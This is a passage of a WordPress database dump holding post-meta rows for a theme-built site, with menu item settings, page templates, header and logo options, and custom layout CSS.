,'_menu_item_object_id','4381'),(2710,4381,'_menu_item_object','custom'),(2711,4381,'_menu_item_target',''),(2712,4381,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2713,4381,'_menu_item_xfn',''),(2714,4381,'_menu_item_url','#'),(2715,4382,'_menu_item_type','custom'),(2716,4382,'_menu_item_menu_item_parent','4356'),(2717,4382,'_menu_item_object_id','4382'),(2718,4382,'_menu_item_object','custom'),(2719,4382,'_menu_item_target',''),(2720,4382,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2721,4382,'_menu_item_xfn',''),(2722,4382,'_menu_item_url','#'),(2723,4383,'_menu_item_type','custom'),(2724,4383,'_menu_item_menu_item_parent','4356'),(2725,4383,'_menu_item_object_id','4383'),(2726,4383,'_menu_item_object','custom'),(2727,4383,'_menu_item_target',''),(2728,4383,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2729,4383,'_menu_item_xfn',''),(2730,4383,'_menu_item_url','#'),(2731,4384,'_menu_item_type','custom'),(2732,4384,'_menu_item_menu_item_parent','4356'),(2733,4384,'_menu_item_object_id','4384'),(2734,4384,'_menu_item_object','custom'),(2735,4384,'_menu_item_target',''),(2736,4384,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2737,4384,'_menu_item_xfn',''),(2738,4384,'_menu_item_url','#'),(2739,4385,'_menu_item_type','custom'),(2740,4385,'_menu_item_menu_item_parent','0'),(2741,4385,'_menu_item_object_id','4385'),(2742,4385,'_menu_item_object','custom'),(2743,4385,'_menu_item_target',''),(2744,4385,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2745,4385,'_menu_item_xfn',''),(2746,4385,'_menu_item_url','#'),(2747,4386,'_menu_item_type','custom'),(2748,4386,'_menu_item_menu_item_parent','0'),(2749,4386,'_menu_item_object_id','4386'),(2750,4386,'_menu_item_object','custom'),(2751,4386,'_menu_item_target',''),(2752,4386,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2753,4386,'_menu_item_xfn',''),(2754,4386,'_menu_item_url','#'),(2771,4389,'_menu_item_type','custom'),(2772,4389,'_menu_item_menu_item_parent','0'),(2773,4389,'_menu_item_object_id','4389'),(2774,4389,'_menu_item_object','custom'),(2775,4389,'_menu_item_target',''),(2776,4389,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2777,4389,'_menu_item_xfn',''),(2778,4389,'_menu_item_url','#'),(2779,4390,'_menu_item_type','custom'),(2780,4390,'_menu_item_menu_item_parent','0'),(2781,4390,'_menu_item_object_id','4390'),(2782,4390,'_menu_item_object','custom'),(2783,4390,'_menu_item_target',''),(2784,4390,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2785,4390,'_menu_item_xfn',''),(2786,4390,'_menu_item_url','#'),(2787,4391,'_menu_item_type','custom'),(2788,4391,'_menu_item_menu_item_parent','0'),(2789,4391,'_menu_item_object_id','4391'),(2790,4391,'_menu_item_object','custom'),(2791,4391,'_menu_item_target',''),(2792,4391,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2793,4391,'_menu_item_xfn',''),(2794,4391,'_menu_item_url','#'),(2795,4392,'_menu_item_type','custom'),(2796,4392,'_menu_item_menu_item_parent','0'),(2797,4392,'_menu_item_object_id','4392'),(2798,4392,'_menu_item_object','custom'),(2799,4392,'_menu_item_target',''),(2800,4392,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2801,4392,'_menu_item_xfn',''),(2802,4392,'_menu_item_url','#'),(2803,4393,'_menu_item_type','custom'),(2804,4393,'_menu_item_menu_item_parent','0'),(2805,4393,'_menu_item_object_id','4393'),(2806,4393,'_menu_item_object','custom'),(2807,4393,'_menu_item_target',''),(2808,4393,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2809,4393,'_menu_item_xfn',''),(2810,4393,'_menu_item_url','#'),(2811,4394,'_menu_item_type','custom'),(2812,4394,'_menu_item_menu_item_parent','0'),(2813,4394,'_menu_item_object_id','4394'),(2814,4394,'_menu_item_object','custom'),(2815,4394,'_menu_item_target',''),(2816,4394,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(2817,4394,'_menu_item_xfn',''),(2818,4394,'_menu_item_url','#'),(2827,6,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2828,6,'_wp_page_template','default'),(2829,6,'slide_template','default'),(2830,6,'qodef_page_content_behind_header_meta','no'),(2831,6,'qodef_boxed_background_image_attachment_meta','fixed'),(2832,6,'qodef_disable_vertical_header_background_image_meta','no'),(2833,6,'qodef_disable_header_widget_logo_area_meta','no'),(2834,6,'qodef_disable_header_widget_menu_area_meta','no'),(2835,6,'qodef_title_area_title_tag_meta','h2'),(2836,6,'_wpb_vc_js_status','false'),(2837,6,'qodef_page_content_top_padding','90'),(2838,6,'qodef_page_content_top_padding_mobile','yes'),(2839,6,'qodef_title_area_height_meta','140'),(2840,6,'qodef_sidebar_layout_meta','sidebar-25-right'),(2841,6,'qodef_custom_sidebar_area_meta','shop-sidebar'),(2842,6,'qodef_set_menu_area_position_meta','center'),(2843,4396,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2844,4396,'_wp_page_template','default'),(2845,4396,'slide_template','default'),(2846,4396,'_wpb_vc_js_status','false'),(2847,4396,'qodef_page_content_behind_header_meta','no'),(2848,4396,'qodef_boxed_background_image_attachment_meta','fixed'),(2849,4396,'qodef_disable_vertical_header_background_image_meta','no'),(2850,4396,'qodef_disable_header_widget_logo_area_meta','no'),(2851,4396,'qodef_disable_header_widget_menu_area_meta','no'),(2852,4396,'qodef_title_area_height_meta','140'),(2853,4396,'qodef_title_area_title_tag_meta','h2'),(2854,4396,'qodef_uncovering_footer_meta','no'),(2855,4397,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2856,4397,'_wp_page_template','default'),(2857,4397,'slide_template','default'),(2858,4397,'_wpb_vc_js_status','false'),(2859,4397,'qodef_page_content_behind_header_meta','no'),(2860,4397,'qodef_boxed_background_image_attachment_meta','fixed'),(2861,4397,'qodef_disable_vertical_header_background_image_meta','no'),(2862,4397,'qodef_disable_header_widget_logo_area_meta','no'),(2863,4397,'qodef_disable_header_widget_menu_area_meta','no'),(2864,4397,'qodef_title_area_height_meta','140'),(2865,4397,'qodef_title_area_title_tag_meta','h2'),(2866,4397,'qodef_uncovering_footer_meta','no'),(2867,9,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2868,9,'_wp_page_template','default'),(2869,9,'slide_template','default'),(2870,9,'_wpb_vc_js_status','false'),(2871,9,'qodef_page_content_behind_header_meta','no'),(2872,9,'qodef_boxed_background_image_attachment_meta','fixed'),(2873,9,'qodef_disable_vertical_header_background_image_meta','no'),(2874,9,'qodef_disable_header_widget_logo_area_meta','no'),(2875,9,'qodef_disable_header_widget_menu_area_meta','no'),(2876,9,'qodef_title_area_height_meta','140'),(2877,9,'qodef_title_area_title_tag_meta','h2'),(2878,9,'qodef_uncovering_footer_meta','no'),(2879,10,'_wpb_shortcodes_custom_css','.vc_custom_1519125565610{padding-top: 96px !important;padding-bottom: 12px !important;}.vc_custom_1519140627330{padding-top: 144px !important;padding-bottom: 0px !important;}.vc_custom_1519125692374{padding-top: 82px !important;padding-bottom: 73px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h1-img10.jpg?id=2753) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1518176405299{padding-top: 57px !important;padding-bottom: 132px !important;}.vc_custom_1519124684606{padding-top: 88px !important;padding-bottom: 112px !important;}.vc_custom_1519121697188{padding-bottom: 30px !important;}.vc_custom_1519124340678{padding-top: 85px !important;}.vc_custom_1519124473237{padding-bottom: 63px !important;}.vc_custom_1516619115957{margin-top: -6px !important;}.vc_custom_1516618148023{margin-top: -11px !important;}.vc_custom_1516615809885{margin-top: -10px !important;}'),(14239,5439,'_wpb_shortcodes_custom_css','.vc_custom_1519125565610{padding-top: 96px !important;padding-bottom: 12px !important;}.vc_custom_1519140627330{padding-top: 144px !important;padding-bottom: 0px !important;}.vc_custom_1519125692374{padding-top: 82px !important;padding-bottom: 73px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h1-img10.jpg?id=2753) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1518176405299{padding-top: 57px !important;padding-bottom: 132px !important;}.vc_custom_1519124684606{padding-top: 88px !important;padding-bottom: 112px !important;}.vc_custom_1519121697188{padding-bottom: 30px !important;}.vc_custom_1519124340678{padding-top: 85px !important;}.vc_custom_1519124473237{padding-bottom: 63px !important;}.vc_custom_1516619115957{margin-top: -6px !important;}.vc_custom_1516618148023{margin-top: -11px !important;}.vc_custom_1516615809885{margin-top: -10px !important;}'),(2881,10,'_wp_page_template','full-width.php'),(2882,10,'slide_template',''),(2883,10,'_wpb_vc_js_status','true'),(2884,10,'qodef_page_content_behind_header_meta','no'),(2885,10,'qodef_boxed_background_image_attachment_meta','fixed'),(2886,10,'qodef_disable_vertical_header_background_image_meta','no'),(2887,10,'qodef_disable_header_widget_logo_area_meta','no'),(2888,10,'qodef_disable_header_widget_menu_area_meta','no'),(2889,10,'qodef_header_type_meta','header-centered'),(2890,10,'qodef_show_title_area_meta','no'),(2891,10,'qodef_initial_content_width_meta','qodef-grid-1100'),(2892,10,'_wpb_shortcodes_custom_css','.vc_custom_1519125565610{padding-top: 96px !important;padding-bottom: 12px !important;}.vc_custom_1519140627330{padding-top: 144px !important;padding-bottom: 0px !important;}.vc_custom_1519125692374{padding-top: 82px !important;padding-bottom: 73px !important;background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/02/h1-img10.jpg?id=2753) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1518176405299{padding-top: 57px !important;padding-bottom: 132px !important;}.vc_custom_1519124684606{padding-top: 88px !important;padding-bottom: 112px !important;}.vc_custom_1519121697188{padding-bottom: 30px !important;}.vc_custom_1519124340678{padding-top: 85px !important;}.vc_custom_1519124473237{padding-bottom: 63px !important;}.vc_custom_1516619115957{margin-top: -6px !important;}.vc_custom_1516618148023{margin-top: -11px !important;}.vc_custom_1516615809885{margin-top: -10px !important;}'),(2893,10,'qodef_page_content_top_padding','0'),(2894,10,'qodef_page_content_top_padding_mobile','yes'),(2895,10,'qodef_top_bar_meta','yes'),(2896,10,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/succulents-logo-veliki.png'),(2897,10,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/succulents-logo-veliki.png'),(2898,10,'qodef_set_menu_area_position_meta','center'),(2899,10,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/succulents-logo-veliki.png'),(2900,10,'qodef_logo_image_mobile_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/logo-1.png'),(2901,10,'_wpb_post_custom_css','@media only screen and (max-width: 480px) {\n .qodef-testimonials-holder.qodef-testimonials-standard .qodef-testimonial-text {\n font-size: 20px;\n }\n}'),(2929,192,'_wpb_shortcodes_custom_css','.vc_custom_1519309669944{margin-top: -10px !important;}'),(2930,192,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2931,192,'_wp_page_template','coming-soon-page.php'),(2932,192,'slide_template','default'),(2933,192,'_wpb_vc_js_status','true'),(2934,192,'qodef_page_content_behind_header_meta','no'),(2935,192,'qodef_boxed_background_image_attachment_meta','fixed'),(2936,192,'qodef_disable_vertical_header_background_image_meta','no'),(2937,192,'qodef_disable_header_widget_logo_area_meta','no'),(2938,192,'qodef_disable_header_widget_menu_area_meta','no'),(2939,192,'qodef_page_content_top_padding','0'),(2940,192,'qodef_page_content_top_padding_mobile','yes'),(2941,192,'qodef_initial_content_width_meta','qodef-grid-1200'),(2942,192,'_wpb_shortcodes_custom_css','.vc_custom_1519309669944{margin-top: -10px !important;}'),(2943,230,'_wpb_shortcodes_custom_css','.vc_custom_1519212365937{padding-top: 118px !important;}.vc_custom_1519212398057{padding-top: 30px !important;padding-bottom: 109px !important;}.vc_custom_1516715206030{margin-top: -7px !important;}.vc_custom_1516715198974{margin-top: -7px !important;}.vc_custom_1516715078902{margin-top: -10px !important;}.vc_custom_1516715086438{margin-top: -10px !important;}'),(2944,230,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2945,230,'_wp_page_template','full-width.php'),(2946,230,'slide_template','default'),(2947,230,'_wpb_vc_js_status','true'),(2948,230,'qodef_page_content_behind_header_meta','no'),(2949,230,'qodef_boxed_background_image_attachment_meta','fixed'),(2950,230,'qodef_disable_vertical_header_background_image_meta','no'),(2951,230,'qodef_disable_header_widget_logo_area_meta','no'),(2952,230,'qodef_disable_header_widget_menu_area_meta','no'),(2953,230,'qodef_show_title_area_meta','no'),(2954,230,'qodef_page_content_top_padding','0'),(2955,230,'qodef_page_content_top_padding_mobile','yes'),(2956,230,'_wpb_shortcodes_custom_css','.vc_custom_1519212365937{padding-top: 118px !important;}.vc_custom_1519212398057{padding-top: 30px !important;padding-bottom: 109px !important;}.vc_custom_1516715206030{margin-top: -7px !important;}.vc_custom_1516715198974{margin-top: -7px !important;}.vc_custom_1516715078902{margin-top: -10px !important;}.vc_custom_1516715086438{margin-top: -10px !important;}'),(2957,230,'qodef_header_type_meta','header-standard'),(2958,230,'qodef_header_behaviour_meta','sticky-header-on-scroll-up'),(2959,230,'qodef_set_menu_area_position_meta','center'),(2960,230,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(2961,230,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(2962,230,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(2963,230,'qodef_top_bar_meta','no'),(2964,281,'_wpb_shortcodes_custom_css','.vc_custom_1520337627128{padding-top: 118px !important;padding-bottom: 225px !important;}.vc_custom_1519314929766{padding-top: 93px !important;padding-bottom: 81px !important;}'),(2965,281,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2966,281,'_wp_page_template','full-width.php'),(2967,281,'slide_template','default'),(2968,281,'_wpb_vc_js_status','true'),(2969,281,'qodef_page_content_behind_header_meta','no'),(2970,281,'qodef_boxed_background_image_attachment_meta','fixed'),(2971,281,'qodef_disable_vertical_header_background_image_meta','no'),(2972,281,'qodef_disable_header_widget_logo_area_meta','no'),(2973,281,'qodef_disable_header_widget_menu_area_meta','no'),(2974,281,'qodef_page_content_top_padding','0'),(2975,281,'qodef_page_content_top_padding_mobile','yes'),(2976,281,'qodef_header_type_meta','header-standard'),(2977,281,'qodef_set_menu_area_position_meta','center'),(2978,281,'qodef_show_title_area_meta','no'),(2979,281,'_wpb_shortcodes_custom_css','.vc_custom_1520337627128{padding-top: 118px !important;padding-bottom: 225px !important;}.vc_custom_1519314929766{padding-top: 93px !important;padding-bottom: 81px !important;}'),(2980,281,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(2981,281,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(2982,281,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(2983,281,'qodef_top_bar_meta','no'),(2984,347,'_wpb_shortcodes_custom_css','.vc_custom_1519035796237{padding-top: 85px !important;padding-bottom: 20px !important;}.vc_custom_1520234035796{padding-top: 23px !important;padding-bottom: 80px !important;}.vc_custom_1518177180547{padding-top: 35px !important;padding-bottom: 115px !important;}.vc_custom_1518010784961{padding-top: 76px !important;}.vc_custom_1519737893175{padding-top: 85px !important;padding-bottom: 66px !important;}.vc_custom_1520432291431{padding-top: 30px !important;padding-bottom: 105px !important;}.vc_custom_1519139742242{padding-top: 123px !important;padding-bottom: 80px !important;}.vc_custom_1519139675386{padding-top: 83px !important;padding-bottom: 22px !important;}.vc_custom_1519139603635{padding-top: 40px !important;padding-bottom: 63px !important;}'),(2985,347,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(2986,347,'_wp_page_template','full-width.php'),(2987,347,'slide_template','default'),(2988,347,'_wpb_vc_js_status','true'),(2989,347,'qodef_page_content_behind_header_meta','no'),(2990,347,'qodef_boxed_background_image_attachment_meta','fixed'),(2991,347,'qodef_disable_vertical_header_background_image_meta','no'),(2992,347,'qodef_disable_header_widget_logo_area_meta','no'),(2993,347,'qodef_disable_header_widget_menu_area_meta','no'),(2994,347,'qodef_page_content_top_padding','0'),(2995,347,'qodef_page_content_top_padding_mobile','yes'),(2996,347,'qodef_show_title_area_meta','no'),(2997,347,'_wpb_shortcodes_custom_css','.vc_custom_1519035796237{padding-top: 85px !important;padding-bottom: 20px !important;}.vc_custom_1520234035796{padding-top: 23px !important;padding-bottom: 80px !important;}.vc_custom_1518177180547{padding-top: 35px !important;padding-bottom: 115px !important;}.vc_custom_1518010784961{padding-top: 76px !important;}.vc_custom_1519737893175{padding-top: 85px !important;padding-bottom: 66px !important;}.vc_custom_1520432291431{padding-top: 30px !important;padding-bottom: 105px !important;}.vc_custom_1519139742242{padding-top: 123px !important;padding-bottom: 80px !important;}.vc_custom_1519139675386{padding-top: 83px !important;padding-bottom: 22px !important;}.vc_custom_1519139603635{padding-top: 40px !important;padding-bottom: 63px !important;}'),(2998,347,'qodef_header_type_meta','header-divided'),(2999,347,'qodef_header_style_meta','light-header'),(3000,347,'qodef_logo_area_background_color_meta','#ffffff'),(3001,347,'qodef_logo_area_background_transparency_meta','0'),(3002,347,'qodef_menu_area_background_color_meta','#ffffff'),(3003,347,'qodef_menu_area_background_transparency_meta','0'),(3004,347,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.jpg'),(3005,347,'qodef_logo_image_mobile_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/logo-1.png'),(3006,347,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/logo-divided-sticky-img-1.png'),(3007,347,'qodef_logo_image_sticky_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/logo-divided-sticky-img-1.png'),(3008,347,'qodef_top_bar_meta','no'),(3009,347,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.jpg'),(3010,406,'_wpb_shortcodes_custom_css','.vc_custom_1519212907688{padding-top: 120px !important;padding-bottom: 40px !important;}.vc_custom_1519212973686{padding-top: 120px !important;padding-bottom: 113px !important;}'),(3011,406,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3012,406,'_wp_page_template','full-width.php'),(3013,406,'slide_template','default'),(3014,406,'_wpb_vc_js_status','true'),(3015,406,'qodef_page_content_behind_header_meta','no'),(3016,406,'qodef_boxed_background_image_attachment_meta','fixed'),(3017,406,'qodef_disable_vertical_header_background_image_meta','no'),(3018,406,'qodef_disable_header_widget_logo_area_meta','no'),(3019,406,'qodef_disable_header_widget_menu_area_meta','no'),(3020,406,'qodef_show_title_area_meta','no'),(3021,406,'qodef_page_content_top_padding','0'),(3022,406,'qodef_page_content_top_padding_mobile','yes'),(3023,406,'_wpb_shortcodes_custom_css','.vc_custom_1519212907688{padding-top: 120px !important;padding-bottom: 40px !important;}.vc_custom_1519212973686{padding-top: 120px !important;padding-bottom: 113px !important;}'),(3024,406,'qodef_header_type_meta','header-standard'),(3025,406,'qodef_set_menu_area_position_meta','center'),(3026,406,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3027,406,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3028,406,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3029,406,'qodef_top_bar_meta','no'),(3030,550,'_wpb_shortcodes_custom_css','.vc_custom_1518011363904{padding-top: 120px !important;padding-bottom: 88px !important;}.vc_custom_1519717725100{padding-top: 98px !important;padding-bottom: 91px !important;}.vc_custom_1520416713120{padding-top: 145px !important;padding-bottom: 110px !important;}.vc_custom_1516782288351{padding-top: 49px !important;padding-bottom: 49px !important;}.vc_custom_1519044427796{margin-top: -9px !important;}.vc_custom_1516721318573{margin-top: -6px !important;}'),(3031,550,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3032,550,'_wp_page_template','full-width.php'),(3033,550,'slide_template','default'),(3034,550,'_wpb_vc_js_status','true'),(3035,550,'qodef_page_content_behind_header_meta','no'),(3036,550,'qodef_boxed_background_image_attachment_meta','fixed'),(3037,550,'qodef_disable_vertical_header_background_image_meta','no'),(3038,550,'qodef_disable_header_widget_logo_area_meta','no'),(3039,550,'qodef_disable_header_widget_menu_area_meta','no'),(3040,550,'qodef_page_content_top_padding','0'),(3041,550,'qodef_page_content_top_padding_mobile','yes'),(3042,550,'qodef_show_title_area_meta','no'),(3043,550,'_wpb_shortcodes_custom_css','.vc_custom_1518011363904{padding-top: 120px !important;padding-bottom: 88px !important;}.vc_custom_1519717725100{padding-top: 98px !important;padding-bottom: 91px !important;}.vc_custom_1520416713120{padding-top: 145px !important;padding-bottom: 110px !important;}.vc_custom_1516782288351{padding-top: 49px !important;padding-bottom: 49px !important;}.vc_custom_1519044427796{margin-top: -9px !important;}.vc_custom_1516721318573{margin-top: -6px !important;}'),(3044,550,'qodef_set_menu_area_position_meta','center'),(3045,550,'qodef_logo_area_background_color_meta','#ffffff'),(3046,550,'qodef_logo_area_background_transparency_meta','0'),(3047,550,'qodef_logo_area_grid_background_color_meta','#000000'),(3048,550,'qodef_logo_area_grid_background_transparency_meta','0'),(3049,550,'qodef_menu_area_grid_background_color_meta','#ffffff'),(3050,550,'qodef_menu_area_grid_background_transparency_meta','0'),(3051,550,'qodef_menu_area_background_color_meta','#ffffff'),(3052,550,'qodef_menu_area_background_transparency_meta','0'),(3053,550,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/succulents-logo-veliki.png'),(3054,550,'qodef_top_bar_meta','yes'),(3055,550,'qodef_top_bar_background_color_meta','#ffffff'),(3056,550,'qodef_top_bar_background_transparency_meta','0'),(3057,585,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3058,585,'_wp_page_template','full-width.php'),(3059,585,'slide_template','default'),(3060,585,'_wpb_vc_js_status','true'),(3061,585,'qodef_page_content_behind_header_meta','no'),(3062,585,'qodef_boxed_background_image_attachment_meta','fixed'),(3063,585,'qodef_disable_vertical_header_background_image_meta','no'),(3064,585,'qodef_disable_header_widget_logo_area_meta','yes'),(3065,585,'qodef_disable_header_widget_menu_area_meta','no'),(3066,585,'qodef_page_content_top_padding','0'),(3067,585,'qodef_page_content_top_padding_mobile','yes'),(3068,585,'qodef_show_title_area_meta','no'),(3069,585,'qodef_header_type_meta','header-minimal'),(3070,585,'qodef_top_bar_background_transparency_meta','0'),(3071,585,'qodef_logo_area_grid_background_color_meta','#ffffff'),(3072,585,'qodef_logo_area_grid_background_transparency_meta','0'),(3073,585,'qodef_logo_area_background_color_meta','#ffffff'),(3074,585,'qodef_logo_area_background_transparency_meta','0'),(3075,585,'qodef_menu_area_background_color_meta','#ffffff'),(3076,585,'qodef_menu_area_background_transparency_meta','0'),(3077,585,'qodef_disable_footer_meta','yes'),(3078,585,'qodef_top_bar_meta','no'),(3079,585,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3080,585,'qodef_logo_image_dark_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3081,585,'qodef_logo_image_light_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png'),(3082,601,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3083,601,'_wp_page_template','full-width.php'),(3084,601,'slide_template','default'),(3085,601,'_wpb_vc_js_status','true'),(3086,601,'qodef_page_content_behind_header_meta','no'),(3087,601,'qodef_boxed_background_image_attachment_meta','fixed'),(3088,601,'qodef_disable_vertical_header_background_image_meta','no'),(3089,601,'qodef_disable_header_widget_logo_area_meta','no'),(3090,601,'qodef_disable_header_widget_menu_area_meta','no'),(3091,650,'_wpb_shortcodes_custom_css','.vc_custom_1519294522702{padding-top: 117px !important;padding-bottom: 90px !important;}.vc_custom_1520335816784{background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/03/h4-img-14.jpg?id=4049) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1519294731545{padding-top: 120px !important;padding-bottom: 62px !important;}.vc_custom_1520412920558{padding-top: 117px !important;padding-bottom: 110px !important;}'),(3092,650,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3093,650,'_wp_page_template','full-width.php'),(3094,650,'slide_template','default'),(3095,650,'_wpb_vc_js_status','true'),(3096,650,'qodef_page_content_behind_header_meta','no'),(3097,650,'qodef_boxed_background_image_attachment_meta','fixed'),(3098,650,'qodef_disable_vertical_header_background_image_meta','no'),(3099,650,'qodef_disable_header_widget_logo_area_meta','no'),(3100,650,'qodef_disable_header_widget_menu_area_meta','no'),(3101,650,'qodef_header_type_meta','header-vertical'),(3102,650,'qodef_page_content_top_padding','0'),(3103,650,'qodef_page_content_top_padding_mobile','yes'),(3104,650,'qodef_show_title_area_meta','no'),(3105,650,'qodef_logo_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/02/small-round-logo-for-new-web.png'),(3106,650,'_wpb_shortcodes_custom_css','.vc_custom_1519294522702{padding-top: 117px !important;padding-bottom: 90px !important;}.vc_custom_1520335816784{background-image: url(http://succulents.select-themes.com/wp-content/uploads/2018/03/h4-img-14.jpg?id=4049) !important;background-position: center !important;background-repeat: no-repeat !important;background-size: cover !important;}.vc_custom_1519294731545{padding-top: 120px !important;padding-bottom: 62px !important;}.vc_custom_1520412920558{padding-top: 117px !important;padding-bottom: 110px !important;}'),(3107,650,'qodef_logo_image_sticky_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/logo-1.png'),(3108,650,'qodef_logo_image_mobile_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/logo-1.png'),(3109,650,'qodef_show_footer_bottom_meta','yes'),(3110,650,'qodef_show_footer_top_meta','no'),(3111,650,'qodef_top_bar_meta','no'),(3112,664,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3113,664,'_wp_page_template','blog-standard'),(3114,664,'slide_template','default'),(3115,664,'_wpb_vc_js_status','true'),(3116,664,'qodef_page_content_behind_header_meta','no'),(3117,664,'qodef_boxed_background_image_attachment_meta','fixed'),(3118,664,'qodef_disable_vertical_header_background_image_meta','no'),(3119,664,'qodef_disable_header_widget_logo_area_meta','no'),(3120,664,'qodef_disable_header_widget_menu_area_meta','no'),(3121,664,'qodef_title_area_height_meta','140'),(3122,664,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(3123,664,'qodef_title_area_title_tag_meta','h2'),(3124,664,'qodef_title_text_color_meta','#3c3c3c'),(3125,664,'qodef_header_type_meta','header-centered'),(3126,664,'qodef_sidebar_layout_meta','sidebar-33-right'),(3127,664,'qodef_page_content_top_padding','40'),(3128,664,'qodef_page_content_top_padding_mobile','yes'),(3129,664,'qodef_show_title_area_meta','no'),(3130,778,'_wpb_shortcodes_custom_css','.vc_custom_1520262026416{padding-top: 117px !important;padding-bottom: 57px !important;}.vc_custom_1519223017507{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1519223458142{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1520416931901{padding-top: 120px !important;padding-bottom: 106px !important;}.vc_custom_1519223603444{padding-top: 120px !important;padding-bottom: 120px !important;}'),(3131,778,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(3132,778,'_wp_page_template','full-width.php'),(3133,778,'slide_template','default'),(3134,778,'_wpb_vc_js_status','true'),(3135,778,'qodef_page_content_behind_header_meta','no'),(3136,778,'qodef_boxed_background_image_attachment_meta','fixed'),(3137,778,'qodef_disable_vertical_header_background_image_meta','no'),(3138,778,'qodef_disable_header_widget_logo_area_meta','no'),(3139,778,'qodef_disable_header_widget_menu_area_meta','no'),(3140,778,'qodef_page_content_top_padding','0'),(3141,778,'qodef_page_content_top_padding_mobile','yes'),(3142,778,'_wpb_shortcodes_custom_css','.vc_custom_1520262026416{padding-top: 117px !important;padding-bottom: 57px !important;}.vc_custom_1519223017507{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1519223458142{padding-top: 120px !important;padding-bottom: 120px !important;}.vc_custom_1520416931901{padding-top: 120px !important;padding-bottom: 106px !important;}.vc_custom_1519223603444{padding-top: 120px !important;padding-bottom: 120px !important;}'),(3143,778,'qodef_show_title_area_meta','no'),(3144,778,'qodef_header_type_meta','header-standard'),(3145,778,'qodef_set_menu_area_position_meta','center'),(3146,778,'_wpb_post_custom_css','.tt_timetable .event_container {\n padding: 38px 10px;\n}\n\n.tt_timetable .event a, .tt_timetable .event .event_header {\n display: block;\n color: #FFF !important;\n font-size: 14px;\n font-weight: bold;\n margin-bottom: 12px;\n text-decoration: none;\n outline: none;\n transition: none !important;\n border: none;\n}\n\n@media only screen and (min-width: 1025px) and (max-width: 1280px) {\n .qodef-page-header .qodef-menu-area .qodef-logo-wrapper a {\n height: 40px 